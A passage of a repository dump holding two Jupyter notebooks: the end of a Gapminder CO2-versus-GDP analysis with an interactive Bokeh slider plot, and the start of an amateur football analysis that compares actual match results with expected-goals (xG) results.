397 |        "    .dataframe thead th {\n",
398 |        "        text-align: left;\n",
399 |        "    }\n",
400 |        "\n",
401 |        "    .dataframe tbody tr th {\n",
402 |        "        vertical-align: top;\n",
403 |        "    }\n",
404 |        "</style>\n",
405 |        "<table border=\"1\" class=\"dataframe\">\n",
406 |        "  <thead>\n",
407 |        "    <tr style=\"text-align: right;\">\n",
408 |        "      <th></th>\n",
409 |        "      <th>country</th>\n",
410 |        "      <th>region</th>\n",
411 |        "      <th>year</th>\n",
412 |        "      <th>co2</th>\n",
413 |        "    </tr>\n",
414 |        "  </thead>\n",
415 |        "  <tbody>\n",
416 |        "    <tr>\n",
417 |        "      <th>0</th>\n",
418 |        "      <td>Afghanistan</td>\n",
419 |        "      <td>South Asia</td>\n",
420 |        "      <td>1800</td>\n",
421 |        "      <td>NaN</td>\n",
422 |        "    </tr>\n",
423 |        "    <tr>\n",
424 |        "      <th>1</th>\n",
425 |        "      <td>Albania</td>\n",
426 |        "      <td>Europe &amp; Central Asia</td>\n",
427 |        "      <td>1800</td>\n",
428 |        "      <td>NaN</td>\n",
429 |        "    </tr>\n",
430 |        "    <tr>\n",
431 |        "      <th>2</th>\n",
432 |        "      <td>Algeria</td>\n",
433 |        "      <td>Middle East &amp; North Africa</td>\n",
434 |        "      <td>1800</td>\n",
435 |        "      <td>NaN</td>\n",
436 |        "    </tr>\n",
437 |        "    <tr>\n",
438 |        "      <th>3</th>\n",
439 |        "      <td>Angola</td>\n",
440 |        "      <td>Sub-Saharan Africa</td>\n",
441 |        "      <td>1800</td>\n",
442 |        "      <td>NaN</td>\n",
443 |        "    </tr>\n",
444 |        "    <tr>\n",
445 |        "      <th>4</th>\n",
446 |        "      <td>Antigua and Barbuda</td>\n",
447 |        "      <td>America</td>\n",
448 |        "      <td>1800</td>\n",
449 |        "      <td>NaN</td>\n",
450 |        "    </tr>\n",
451 |        "  </tbody>\n",
452 |        "</table>\n",
453 |        "</div>"
454 |       ],
455 |       "text/plain": [
456 |        "               country                      region  year  co2\n",
457 |        "0          Afghanistan                  South Asia  1800  NaN\n",
458 |        "1              Albania       Europe & Central Asia  1800  NaN\n",
459 |        "2              Algeria  Middle East & North Africa  1800  NaN\n",
460 |        "3               Angola          Sub-Saharan Africa  1800  NaN\n",
461 |        "4  Antigua and Barbuda                     America  1800  NaN"
462 |       ]
463 |      },
464 |      "execution_count": 22,
465 |      "metadata": {},
466 |      "output_type": "execute_result"
467 |     }
468 |    ],
469 |    "source": [
470 |     "new_df = pd.melt(data_with_regions, id_vars=['country', 'region'])\n",
471 |     "columns = ['country', 'region', 'year', 'co2']\n",
472 |     "new_df.columns = columns\n",
473 |     "new_df['year'] = new_df['year'].astype('int64')\n",
474 |     "new_df.head()"
475 |    ]
476 |   },
477 |   {
478 |    "cell_type": "code",
479 |    "execution_count": 24,
480 |    "metadata": {},
481 |    "outputs": [
482 |     {
483 |      "data": {
484 |       "text/html": [
485 |        "<div>\n",
486 |        "<style>\n",
487 |        "    .dataframe thead tr:only-child th {\n",
488 |        "        text-align: right;\n",
489 |        "    }\n",
490 |        "\n",
491 |        "    .dataframe thead th {\n",
492 |        "        text-align: left;\n",
493 |        "    }\n",
494 |        "\n",
495 |        "    .dataframe tbody tr th {\n",
496 |        "        vertical-align: top;\n",
497 |        "    }\n",
498 |        "</style>\n",
499 |        "<table border=\"1\" class=\"dataframe\">\n",
500 |        "  <thead>\n",
501 |        "    <tr style=\"text-align: right;\">\n",
502 |        "      <th></th>\n",
503 |        "      <th>country</th>\n",
504 |        "      <th>region</th>\n",
505 |        "      <th>year</th>\n",
506 |        "      <th>co2</th>\n",
507 |        "    </tr>\n",
508 |        "  </thead>\n",
509 |        "  <tbody>\n",
510 |        "    <tr>\n",
511 |        "      <th>28372</th>\n",
512 |        "      <td>Afghanistan</td>\n",
513 |        "      <td>South Asia</td>\n",
514 |        "      <td>1964</td>\n",
515 |        "      <td>0.0863</td>\n",
516 |        "    </tr>\n",
517 |        "    <tr>\n",
518 |        "      <th>28545</th>\n",
519 |        "      <td>Afghanistan</td>\n",
520 |        "      <td>South Asia</td>\n",
521 |        "      <td>1965</td>\n",
522 |        "      <td>0.1010</td>\n",
523 |        "    </tr>\n",
524 |        "    <tr>\n",
525 |        "      <th>28718</th>\n",
526 |        "      <td>Afghanistan</td>\n",
527 |        "      <td>South Asia</td>\n",
528 |        "      <td>1966</td>\n",
529 |        "      <td>0.1080</td>\n",
530 |        "    </tr>\n",
531 |        "    <tr>\n",
532 |        "      <th>28891</th>\n",
533 |        "      <td>Afghanistan</td>\n",
534 |        "      <td>South Asia</td>\n",
535 |        "      <td>1967</td>\n",
536 |        "      <td>0.1240</td>\n",
537 |        "    </tr>\n",
538 |        "    <tr>\n",
539 |        "      <th>29064</th>\n",
540 |        "      <td>Afghanistan</td>\n",
541 |        "      <td>South Asia</td>\n",
542 |        "      <td>1968</td>\n",
543 |        "      <td>0.1160</td>\n",
544 |        "    </tr>\n",
545 |        "  </tbody>\n",
546 |        "</table>\n",
547 |        "</div>"
548 |       ],
549 |       "text/plain": [
550 |        "           country      region  year     co2\n",
551 |        "28372  Afghanistan  South Asia  1964  0.0863\n",
552 |        "28545  Afghanistan  South Asia  1965  0.1010\n",
553 |        "28718  Afghanistan  South Asia  1966  0.1080\n",
554 |        "28891  Afghanistan  South Asia  1967  0.1240\n",
555 |        "29064  Afghanistan  South Asia  1968  0.1160"
556 |       ]
557 |      },
558 |      "execution_count": 24,
559 |      "metadata": {},
560 |      "output_type": "execute_result"
561 |     }
562 |    ],
563 |    "source": [
564 |     "upd_new_df = new_df[new_df['year'].astype('int64') > 1963]\n",
565 |     "upd_new_df = upd_new_df.sort_values(by=['country', 'year'])\n",
566 |     "upd_new_df.head()"
567 |    ]
568 |   },
569 |   {
570 |    "cell_type": "code",
571 |    "execution_count": 25,
572 |    "metadata": {},
573 |    "outputs": [
574 |     {
575 |      "name": "stdout",
576 |      "output_type": "stream",
577 |      "text": [
578 |       "<class 'pandas.core.frame.DataFrame'>\n",
579 |       "RangeIndex: 10111 entries, 0 to 10110\n",
580 |       "Data columns (total 3 columns):\n",
581 |       "country    10111 non-null object\n",
582 |       "year       10111 non-null int64\n",
583 |       "gdp        9000 non-null float64\n",
584 |       "dtypes: float64(1), int64(1), object(1)\n",
585 |       "memory usage: 237.1+ KB\n"
586 |      ]
587 |     }
588 |    ],
589 |    "source": [
590 |     "df_gdp = gapminder[['Country', 'Year', 'gdp']]\n",
591 |     "df_gdp.columns = ['country', 'year', 'gdp']\n",
592 |     "df_gdp.info()"
593 |    ]
594 |   },
595 |   {
596 |    "cell_type": "code",
597 |    "execution_count": 26,
598 |    "metadata": {},
599 |    "outputs": [
600 |     {
601 |      "data": {
602 |       "text/html": [
603 |        "<div>\n",
604 |        "<style>\n",
605 |        "    .dataframe thead tr:only-child th {\n",
606 |        "        text-align: right;\n",
607 |        "    }\n",
608 |        "\n",
609 |        "    .dataframe thead th {\n",
610 |        "        text-align: left;\n",
611 |        "    }\n",
612 |        "\n",
613 |        "    .dataframe tbody tr th {\n",
614 |        "        vertical-align: top;\n",
615 |        "    }\n",
616 |        "</style>\n",
617 |        "<table border=\"1\" class=\"dataframe\">\n",
618 |        "  <thead>\n",
619 |        "    <tr style=\"text-align: right;\">\n",
620 |        "      <th></th>\n",
621 |        "      <th>country</th>\n",
622 |        "      <th>region</th>\n",
623 |        "      <th>year</th>\n",
624 |        "      <th>co2</th>\n",
625 |        "      <th>gdp</th>\n",
626 |        "    </tr>\n",
627 |        "  </thead>\n",
628 |        "  <tbody>\n",
629 |        "    <tr>\n",
630 |        "      <th>0</th>\n",
631 |        "      <td>Afghanistan</td>\n",
632 |        "      <td>South Asia</td>\n",
633 |        "      <td>1964</td>\n",
634 |        "      <td>0.0863</td>\n",
635 |        "      <td>1182.0</td>\n",
636 |        "    </tr>\n",
637 |        "    <tr>\n",
638 |        "      <th>1</th>\n",
639 |        "      <td>Afghanistan</td>\n",
640 |        "      <td>South Asia</td>\n",
641 |        "      <td>1965</td>\n",
642 |        "      <td>0.1010</td>\n",
643 |        "      <td>1182.0</td>\n",
644 |        "    </tr>\n",
645 |        "    <tr>\n",
646 |        "      <th>2</th>\n",
647 |        "      <td>Afghanistan</td>\n",
648 |        "      <td>South Asia</td>\n",
649 |        "      <td>1966</td>\n",
650 |        "      <td>0.1080</td>\n",
651 |        "      <td>1168.0</td>\n",
652 |        "    </tr>\n",
653 |        "    <tr>\n",
654 |        "      <th>3</th>\n",
655 |        "      <td>Afghanistan</td>\n",
656 |        "      <td>South Asia</td>\n",
657 |        "      <td>1967</td>\n",
658 |        "      <td>0.1240</td>\n",
659 |        "      <td>1173.0</td>\n",
660 |        "    </tr>\n",
661 |        "    <tr>\n",
662 |        "      <th>4</th>\n",
663 |        "      <td>Afghanistan</td>\n",
664 |        "      <td>South Asia</td>\n",
665 |        "      <td>1968</td>\n",
666 |        "      <td>0.1160</td>\n",
667 |        "      <td>1187.0</td>\n",
668 |        "    </tr>\n",
669 |        "  </tbody>\n",
670 |        "</table>\n",
671 |        "</div>"
672 |       ],
673 |       "text/plain": [
674 |        "       country      region  year     co2     gdp\n",
675 |        "0  Afghanistan  South Asia  1964  0.0863  1182.0\n",
676 |        "1  Afghanistan  South Asia  1965  0.1010  1182.0\n",
677 |        "2  Afghanistan  South Asia  1966  0.1080  1168.0\n",
678 |        "3  Afghanistan  South Asia  1967  0.1240  1173.0\n",
679 |        "4  Afghanistan  South Asia  1968  0.1160  1187.0"
680 |       ]
681 |      },
682 |      "execution_count": 26,
683 |      "metadata": {},
684 |      "output_type": "execute_result"
685 |     }
686 |    ],
687 |    "source": [
688 |     "final_df = pd.merge(upd_new_df, df_gdp, on=['country', 'year'], how='left')\n",
689 |     "final_df = final_df.dropna()\n",
690 |     "final_df.head()"
691 |    ]
692 |   },
693 |   {
694 |    "cell_type": "code",
695 |    "execution_count": 27,
696 |    "metadata": {},
697 |    "outputs": [],
698 |    "source": [
699 |     "# Creating visualization app with Bokeh.io\n",
700 |     "regions_list = final_df.region.unique().tolist()\n",
701 |     "color_mapper = CategoricalColorMapper(factors=regions_list, palette=Spectral6)"
702 |    ]
703 |   },
704 |   {
705 |    "cell_type": "code",
706 |    "execution_count": 28,
707 |    "metadata": {},
708 |    "outputs": [],
709 |    "source": [
710 |     "# Make the ColumnDataSource: source\n",
711 |     "source = ColumnDataSource(data={\n",
712 |     "    'x': final_df.gdp[final_df['year'] == 1964],\n",
713 |     "    'y': final_df.co2[final_df['year'] == 1964],\n",
714 |     "    'country': final_df.country[final_df['year'] == 1964],\n",
715 |     "    'region': final_df.region[final_df['year'] == 1964],\n",
716 |     "})"
717 |    ]
718 |   },
719 |   {
720 |    "cell_type": "code",
721 |    "execution_count": 29,
722 |    "metadata": {},
723 |    "outputs": [],
724 |    "source": [
725 |     "# Save the minimum and maximum values of the fertility column: xmin, xmax\n",
726 |     "xmin, xmax = min(final_df.gdp), max(final_df.gdp)\n",
727 |     "\n",
728 |     "# Save the minimum and maximum values of the life expectancy column: ymin, ymax\n",
729 |     "ymin, ymax = min(final_df.co2), max(final_df.co2)"
730 |    ]
731 |   },
732 |   {
733 |    "cell_type": "code",
734 |    "execution_count": 30,
735 |    "metadata": {},
736 |    "outputs": [],
737 |    "source": [
738 |     "# Create the figure: plot\n",
739 |     "plot = figure(title='Gapminder Data for 1964', plot_height=400, plot_width=700,\n",
740 |     "              x_range=(xmin, xmax), y_range=(ymin, ymax))\n",
741 |     "\n",
742 |     "# Add circle glyphs to the plot\n",
743 |     "plot.circle(x='x', y='y', fill_alpha=0.8, source=source, legend='region',\n",
744 |     "            color=dict(field='region', transform=color_mapper))\n",
745 |     "\n",
746 |     "# Set the legend.location attribute of the plot to 'top_right'\n",
747 |     "plot.legend.location = 'top_right'\n",
748 |     "\n",
749 |     "# Set the x-axis label\n",
750 |     "plot.xaxis.axis_label = 'GDP'\n",
751 |     "\n",
752 |     "# Set the y-axis label\n",
753 |     "plot.yaxis.axis_label = 'CO2 emissions (tonnes per person)'"
754 |    ]
755 |   },
756 |   {
757 |    "cell_type": "code",
758 |    "execution_count": 31,
759 |    "metadata": {},
760 |    "outputs": [],
761 |    "source": [
762 |     "def update_plot(attr, old, new):\n",
763 |     "    # set the `yr` name to `slider.value` and `source.data = new_data`\n",
764 |     "    yr = slider.value\n",
765 |     "\n",
766 |     "    new_data = {\n",
767 |     "        'x': final_df.gdp[final_df['year'] == yr],\n",
768 |     "        'y': final_df.co2[final_df['year'] == yr],\n",
769 |     "        'country': final_df.country[final_df['year'] == yr],\n",
770 |     "        'region': final_df.region[final_df['year'] == yr],\n",
771 |     "    }\n",
772 |     "    source.data = new_data\n",
773 |     "\n",
774 |     "    # Add title to figure: plot.title.text\n",
775 |     "    plot.title.text = 'Gapminder data for %d' % yr"
776 |    ]
777 |   },
778 |   {
779 |    "cell_type": "code",
780 |    "execution_count": 32,
781 |    "metadata": {},
782 |    "outputs": [],
783 |    "source": [
784 |     "# Make a slider object: slider\n",
785 |     "slider = Slider(start=1964, end=2013, step=1, value=1964, title='Year')\n",
786 |     "\n",
787 |     "# Attach the callback to the 'value' property of slider\n",
788 |     "slider.on_change('value', update_plot)"
789 |    ]
790 |   },
791 |   {
792 |    "cell_type": "code",
793 |    "execution_count": 33,
794 |    "metadata": {},
795 |    "outputs": [],
796 |    "source": [
797 |     "# Create a HoverTool: hover\n",
798 |     "hover = HoverTool(tooltips=[('Country', '@country')])\n",
799 |     "\n",
800 |     "# Add the HoverTool to the plot\n",
801 |     "plot.add_tools(hover)"
802 |    ]
803 |   },
804 |   {
805 |    "cell_type": "code",
806 |    "execution_count": 34,
807 |    "metadata": {},
808 |    "outputs": [],
809 |    "source": [
810 |     "# Make a row layout of widgetbox(slider) and plot and add it to the current document\n",
811 |     "layout = row(widgetbox(slider), plot)\n",
812 |     "curdoc().add_root(layout)"
813 |    ]
814 |   }
815 |  ],
816 |  "metadata": {
817 |   "kernelspec": {
818 |    "display_name": "Python 3",
819 |    "language": "python",
820 |    "name": "python3"
821 |   },
822 |   "language_info": {
823 |    "codemirror_mode": {
824 |     "name": "ipython",
825 |     "version": 3
826 |    },
827 |    "file_extension": ".py",
828 |    "mimetype": "text/x-python",
829 |    "name": "python",
830 |    "nbconvert_exporter": "python",
831 |    "pygments_lexer": "ipython3",
832 |    "version": "3.6.3"
833 |   }
834 |  },
835 |  "nbformat": 4,
836 |  "nbformat_minor": 2
837 | }
838 | 


--------------------------------------------------------------------------------
/is_football_fair.ipynb:
--------------------------------------------------------------------------------
  1 | {
  2 |  "cells": [
  3 |   {
  4 |    "cell_type": "markdown",
  5 |    "metadata": {},
  6 |    "source": [
  7 |     "# Is Football Fair?\n",
  8 |     "\n",
  9 |     "Good question, isn't it? Seeing how Real Madrid wins their Champions League trophies (yes, I am a Barcelona fan) one might think it is not fair at all. Also, knowing that the game is low-scoring and luck plays quite a role in it, one might get to the same conclusion - the game isn't fair at all.\n",
 10 |     "\n",
 11 |     "But what do we mean by calling a game fair? In the end, if the team won, they fought for it, they deserved the victory and this victory is fair for them. From the other side, we have seen a lot of lucky goals or unfortunate errors that led to goals that made a decisive turn in the game. If favourite always wins - is it fair? Probably. But it is not that fun. From the other side, when outsider wins, is this fair?\n",
 12 |     "\n",
 13 |     "I guess the right answer will always be \"it depends\". It depends on an effort that a team put into their victory. If the team plays well and wins it is fair, correct? If the team can't even make a shot on the opponent's goal and loses, it is also fair, correct?\n",
 14 |     "\n",
 15 |     "Another story is when a team plays incredibly well, creates moments, attacks. but cannot score, while the opponent makes one shot, scores one goal and wins. This is totally unfair. These days we have the possibility to evaluate an effort that team made in every particular game and see if th result of that effort was fair.\n",
 16 |     "\n",
 17 |     "xG metric shows us an expected goal value for every shot in the game and usually it is a great indicator of an amount of moments the team created to score a goal. \n",
 18 |     "\n",
 19 |     "I have found a dataset with xG metrics for every game in the last few years in 40 different football leagues. More about where and how I got that data [here](https://medium.com/geekculture/scraping-xg-data-for-almost-any-league-in-the-world-9e9ddcc2a339?sk=3e422d47b778038eaab6bab7150dad7b).\n",
 20 |     "\n",
 21 |     "\n",
 22 |     "## Plan of action\n",
 23 |     "So, if the team created enough moments to score 2 goals and scored 2 - it is fair. If their opponent created moments for 1 goal and scored 1, the final result should've been 2-1 and the first team should have won. That's what we will call fair. We have to calculate the amount of games that ended up 'fairly' - if the xG of one team is bigger than the xG of another, the result has to be the victory of the first team. The same goes for draws - both teams created moments for 1 goals each, then draw is a fair result.\n",
 24 |     "\n",
 25 |     "*Note:* Obviously, the time of goal scoring is important in football, who scores first too, and many-many other factors. I am not pretending to be the judge of fairness, just a simple general look into data for a lot of games to see some basic trends.\n",
 26 |     "\n",
 27 |     "In the perfect and fair world if we were to compare xG results with actual results the compatibility should have been 100%, which means that all the games that ended up with one result or another based on xG, ended up the same in reality. Also, in such a world unicorns could have been possible.\n",
 28 |     "\n",
 29 |     "Let's assume that if 90% of the games won/drawn/lost by xG in reality ended up with the same result, we can call football fair. This number, 90%, is taken out of nothing and is subject to discussions. Also, probably, it might make sense to calculate this 'coefficient of fairness' in basketball and then apply it to football. As basket is a high-scoring game, the influence of luck is quite reduced here, meaning that normally a stronger team will win. Finding out the percentage of games that end up with xg_result=actual_result will create a benchmark for this 'coefficient of fairness'. Maybe that's a topic for the next article. At the moment let's use the 90% benchmark.\n"
 30 |    ]
 31 |   },
 32 |   {
 33 |    "cell_type": "markdown",
 34 |    "metadata": {},
 35 |    "source": [
 36 |     "## Process"
 37 |    ]
 38 |   },
 39 |   {
 40 |    "cell_type": "markdown",
 41 |    "metadata": {},
 42 |    "source": [
 43 |     "Let's import standard data manipulation libraries and get our data."
 44 |    ]
 45 |   },
 46 |   {
 47 |    "cell_type": "code",
 48 |    "execution_count": 14,
 49 |    "metadata": {},
 50 |    "outputs": [],
 51 |    "source": [
 52 |     "import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n",
 53 |     "import numpy as np\n",
 54 |     "import matplotlib.pyplot as plt"
 55 |    ]
 56 |   },
 57 |   {
 58 |    "cell_type": "code",
 59 |    "execution_count": 15,
 60 |    "metadata": {},
 61 |    "outputs": [],
 62 |    "source": [
 63 |     "URL = 'https://projects.fivethirtyeight.com/soccer-api/club/spi_matches.csv'\n",
 64 |     "\n",
 65 |     "data = pd.read_csv(URL)"
 66 |    ]
 67 |   },
 68 |   {
 69 |    "cell_type": "markdown",
 70 |    "metadata": {},
 71 |    "source": [
 72 |     "Checking the columns in our dataset."
 73 |    ]
 74 |   },
 75 |   {
 76 |    "cell_type": "code",
 77 |    "execution_count": 16,
 78 |    "metadata": {},
 79 |    "outputs": [
 80 |     {
 81 |      "data": {
 82 |       "text/plain": [
 83 |        "Index(['season', 'date', 'league_id', 'league', 'team1', 'team2', 'spi1',\n",
 84 |        "       'spi2', 'prob1', 'prob2', 'probtie', 'proj_score1', 'proj_score2',\n",
 85 |        "       'importance1', 'importance2', 'score1', 'score2', 'xg1', 'xg2', 'nsxg1',\n",
 86 |        "       'nsxg2', 'adj_score1', 'adj_score2'],\n",
 87 |        "      dtype='object')"
 88 |       ]
 89 |      },
 90 |      "execution_count": 16,
 91 |      "metadata": {},
 92 |      "output_type": "execute_result"
 93 |     }
 94 |    ],
 95 |    "source": [
 96 |     "data.columns"
 97 |    ]
 98 |   },
 99 |   {
100 |    "cell_type": "markdown",
101 |    "metadata": {},
102 |    "source": [
103 |     "We won't need the majority of this columns, so we select only those we are interested in: 'season', 'date', 'league', 'team1', 'team2', 'score1', 'score2', 'xg1', 'xg2'. At the same time we drop all the rows with null values in this modified dataset as we cannot use them at all."
104 |    ]
105 |   },
106 |   {
107 |    "cell_type": "code",
108 |    "execution_count": 17,
109 |    "metadata": {},
110 |    "outputs": [],
111 |    "source": [
112 |     "# championship = data[data['league'] == 'English League Championship']\n",
113 |     "data = data[['season', 'date', 'league', 'team1', 'team2', 'score1', 'score2', 'xg1', 'xg2']]\n",
114 |     "data = data.dropna()"
115 |    ]
116 |   },
117 |   {
118 |    "cell_type": "markdown",
119 |    "metadata": {},
120 |    "source": [
121 |     "`describe()` method is an excellent way to quickly get an idea of what kind of data we have here. As we can see, the analysis will be based on 29659 games from different countries and different levels of leagues, with the data from 2016 to 2022. We can also see that record amount of goals is 13 during this period of time, while the maximum xG is 8.27 (and it has yet to be confirmed if that happened in the same game)."
122 |    ]
123 |   },
124 |   {
125 |    "cell_type": "code",
126 |    "execution_count": 18,
127 |    "metadata": {},
128 |    "outputs": [
129 |     {
130 |      "data": {
131 |       "text/html": [
132 |        "<div>\n",
133 |        "<style scoped>\n",
134 |        "    .dataframe tbody tr th:only-of-type {\n",
135 |        "        vertical-align: middle;\n",
136 |        "    }\n",
137 |        "\n",
138 |        "    .dataframe tbody tr th {\n",
139 |        "        vertical-align: top;\n",
140 |        "    }\n",
141 |        "\n",
142 |        "    .dataframe thead th {\n",
143 |        "        text-align: right;\n",
144 |        "    }\n",
145 |        "</style>\n",
146 |        "<table border=\"1\" class=\"dataframe\">\n",
147 |        "  <thead>\n",
148 |        "    <tr style=\"text-align: right;\">\n",
149 |        "      <th></th>\n",
150 |        "      <th>season</th>\n",
151 |        "      <th>score1</th>\n",
152 |        "      <th>score2</th>\n",
153 |        "      <th>xg1</th>\n",
154 |        "      <th>xg2</th>\n",
155 |        "    </tr>\n",
156 |        "  </thead>\n",
157 |        "  <tbody>\n",
158 |        "    <tr>\n",
159 |        "      <th>count</th>\n",
160 |        "      <td>29659.00</td>\n",
161 |        "      <td>29659.00</td>\n",
162 |        "      <td>29659.00</td>\n",
163 |        "      <td>29659.00</td>\n",
164 |        "      <td>29659.00</td>\n",
165 |        "    </tr>\n",
166 |        "    <tr>\n",
167 |        "      <th>mean</th>\n",
168 |        "      <td>2018.94</td>\n",
169 |        "      <td>1.52</td>\n",
170 |        "      <td>1.19</td>\n",
171 |        "      <td>1.49</td>\n",
172 |        "      <td>1.19</td>\n",
173 |        "    </tr>\n",
174 |        "    <tr>\n",
175 |        "      <th>std</th>\n",
176 |        "      <td>1.64</td>\n",
177 |        "      <td>1.27</td>\n",
178 |        "      <td>1.14</td>\n",
179 |        "      <td>0.83</td>\n",
180 |        "      <td>0.74</td>\n",
181 |        "    </tr>\n",
182 |        "    <tr>\n",
183 |        "      <th>min</th>\n",
184 |        "      <td>2016.00</td>\n",
185 |        "      <td>0.00</td>\n",
186 |        "      <td>0.00</td>\n",
187 |        "      <td>0.00</td>\n",
188 |        "      <td>0.00</td>\n",
189 |        "    </tr>\n",
190 |        "    <tr>\n",
191 |        "      <th>25%</th>\n",
192 |        "      <td>2018.00</td>\n",
193 |        "      <td>1.00</td>\n",
194 |        "      <td>0.00</td>\n",
195 |        "      <td>0.88</td>\n",
196 |        "      <td>0.63</td>\n",
197 |        "    </tr>\n",
198 |        "    <tr>\n",
199 |        "      <th>50%</th>\n",
200 |        "      <td>2019.00</td>\n",
201 |        "      <td>1.00</td>\n",
202 |        "      <td>1.00</td>\n",
203 |        "      <td>1.36</td>\n",
204 |        "      <td>1.05</td>\n",
205 |        "    </tr>\n",
206 |        "    <tr>\n",
207 |        "      <th>75%</th>\n",
208 |        "      <td>2020.00</td>\n",
209 |        "      <td>2.00</td>\n",
210 |        "      <td>2.00</td>\n",
211 |        "      <td>1.96</td>\n",
212 |        "      <td>1.59</td>\n",
213 |        "    </tr>\n",
214 |        "    <tr>\n",
215 |        "      <th>max</th>\n",
216 |        "      <td>2022.00</td>\n",
217 |        "      <td>10.00</td>\n",
218 |        "      <td>13.00</td>\n",
219 |        "      <td>7.07</td>\n",
220 |        "      <td>8.27</td>\n",
221 |        "    </tr>\n",
222 |        "  </tbody>\n",
223 |        "</table>\n",
224 |        "</div>"
225 |       ],
226 |       "text/plain": [
227 |        "         season    score1    score2       xg1       xg2\n",
228 |        "count  29659.00  29659.00  29659.00  29659.00  29659.00\n",
229 |        "mean    2018.94      1.52      1.19      1.49      1.19\n",
230 |        "std        1.64      1.27      1.14      0.83      0.74\n",
231 |        "min     2016.00      0.00      0.00      0.00      0.00\n",
232 |        "25%     2018.00      1.00      0.00      0.88      0.63\n",
233 |        "50%     2019.00      1.00      1.00      1.36      1.05\n",
234 |        "75%     2020.00      2.00      2.00      1.96      1.59\n",
235 |        "max     2022.00     10.00     13.00      7.07      8.27"
236 |       ]
237 |      },
238 |      "execution_count": 18,
239 |      "metadata": {},
240 |      "output_type": "execute_result"
241 |     }
242 |    ],
243 |    "source": [
244 |     "data.describe().round(2)"
245 |    ]
246 |   },
247 |   {
248 |    "cell_type": "markdown",
249 |    "metadata": {},
250 |    "source": [
251 |     "Well, OK. That happened in the same game."
252 |    ]
253 |   },
254 |   {
255 |    "cell_type": "code",
256 |    "execution_count": 19,
257 |    "metadata": {},
258 |    "outputs": [
259 |     {
260 |      "data": {
261 |       "text/html": [
262 |        "<div>\n",
263 |        "<style scoped>\n",
264 |        "    .dataframe tbody tr th:only-of-type {\n",
265 |        "        vertical-align: middle;\n",
266 |        "    }\n",
267 |        "\n",
268 |        "    .dataframe tbody tr th {\n",
269 |        "        vertical-align: top;\n",
270 |        "    }\n",
271 |        "\n",
272 |        "    .dataframe thead th {\n",
273 |        "        text-align: right;\n",
274 |        "    }\n",
275 |        "</style>\n",
276 |        "<table border=\"1\" class=\"dataframe\">\n",
277 |        "  <thead>\n",
278 |        "    <tr style=\"text-align: right;\">\n",
279 |        "      <th></th>\n",
280 |        "      <th>season</th>\n",
281 |        "      <th>date</th>\n",
282 |        "      <th>league</th>\n",
283 |        "      <th>team1</th>\n",
284 |        "      <th>team2</th>\n",
285 |        "      <th>score1</th>\n",
286 |        "      <th>score2</th>\n",
287 |        "      <th>xg1</th>\n",
288 |        "      <th>xg2</th>\n",
289 |        "    </tr>\n",
290 |        "  </thead>\n",
291 |        "  <tbody>\n",
292 |        "    <tr>\n",
293 |        "      <th>35662</th>\n",
294 |        "      <td>2020</td>\n",
295 |        "      <td>2020-10-24</td>\n",
296 |        "      <td>Dutch Eredivisie</td>\n",
297 |        "      <td>VVV Venlo</td>\n",
298 |        "      <td>Ajax</td>\n",
299 |        "      <td>0.0</td>\n",
300 |        "      <td>13.0</td>\n",
301 |        "      <td>0.23</td>\n",
302 |        "      <td>8.27</td>\n",
303 |        "    </tr>\n",
304 |        "  </tbody>\n",
305 |        "</table>\n",
306 |        "</div>"
307 |       ],
308 |       "text/plain": [
309 |        "       season        date            league      team1 team2  score1  score2  \\\n",
310 |        "35662    2020  2020-10-24  Dutch Eredivisie  VVV Venlo  Ajax     0.0    13.0   \n",
311 |        "\n",
312 |        "        xg1   xg2  \n",
313 |        "35662  0.23  8.27  "
314 |       ]
315 |      },
316 |      "execution_count": 19,
317 |      "metadata": {},
318 |      "output_type": "execute_result"
319 |     }
320 |    ],
321 |    "source": [
322 |     "data[data['xg2'] > 8]"
323 |    ]
324 |   },
325 |   {
326 |    "cell_type": "markdown",
327 |    "metadata": {},
328 |    "source": [
329 |     "As dataset do not give us a column `'result'` we will calculate it on our own. The same will be done for the column `'xg_result'` only with a little tweak - rounding to the integer, because without it the draws are impossible. Yes, rounding may distort a result somehow, but as was stated before, this article is not pretending to be published in science journal, just amateur playing around with numbers. \n",
330 |     "\n",
331 |     "To create these columns `np.select` is a perfect tool for the job. It's kinda case-when statement."
332 |    ]
333 |   },
334 |   {
335 |    "cell_type": "code",
336 |    "execution_count": 20,
337 |    "metadata": {},
338 |    "outputs": [],
339 |    "source": [
340 |     "conditions = [\n",
341 |     "    (data['score1'] > data['score2']),\n",
342 |     "    (data['score1'] == data['score2']),\n",
343 |     "    (data['score1'] < data['score2'])\n",
344 |     "]\n",
345 |     "values = ['1', 'X', '2'] # home_win, draw, away_win\n",
346 |     "data['result'] = np.select(conditions, values)"
347 |    ]
348 |   },
349 |   {
350 |    "cell_type": "code",
351 |    "execution_count": 21,
352 |    "metadata": {},
353 |    "outputs": [],
354 |    "source": [
355 |     "xg_conditions = [\n",
356 |     "    (data['xg1'].round(0) > data['xg2'].round(0)),\n",
357 |     "    (data['xg1'].round(0) == data['xg2'].round(0)),\n",
358 |     "    (data['xg1'].round(0) < data['xg2'].round(0))\n",
359 |     "]\n",
360 |     "xg_values = ['1', 'X', '2'] # home_win, draw, away_win\n",
361 |     "data['xg_result'] = np.select(xg_conditions, xg_values)"
362 |    ]
363 |   },
364 |   {
365 |    "cell_type": "markdown",
366 |    "metadata": {},
367 |    "source": [
368 |     "We take a look at our data and we already see that results do not match in 4 cases out of 5. But this selection isn't representative, we have to check out at all the games."
369 |    ]
370 |   },
371 |   {
372 |    "cell_type": "code",
373 |    "execution_count": 22,
374 |    "metadata": {},
375 |    "outputs": [
376 |     {
377 |      "data": {
378 |       "text/html": [
379 |        "<div>\n",
380 |        "<style scoped>\n",
381 |        "    .dataframe tbody tr th:only-of-type {\n",
382 |        "        vertical-align: middle;\n",
383 |        "    }\n",
384 |        "\n",
385 |        "    .dataframe tbody tr th {\n",
386 |        "        vertical-align: top;\n",
387 |        "    }\n",
388 |        "\n",
389 |        "    .dataframe thead th {\n",
390 |        "        text-align: right;\n",
391 |        "    }\n",
392 |        "</style>\n",
393 |        "<table border=\"1\" class=\"dataframe\">\n",
394 |        "  <thead>\n",
395 |        "    <tr style=\"text-align: right;\">\n",
396 |        "      <th></th>\n",
397 |        "      <th>season</th>\n",
398 |        "      <th>date</th>\n",
399 |        "      <th>league</th>\n",
400 |        "      <th>team1</th>\n",
401 |        "      <th>team2</th>\n",
402 |        "      <th>score1</th>\n",
403 |        "      <th>score2</th>\n",
404 |        "      <th>xg1</th>\n",
405 |        "      <th>xg2</th>\n",
406 |        "      <th>result</th>\n",
407 |        "      <th>xg_result</th>\n",
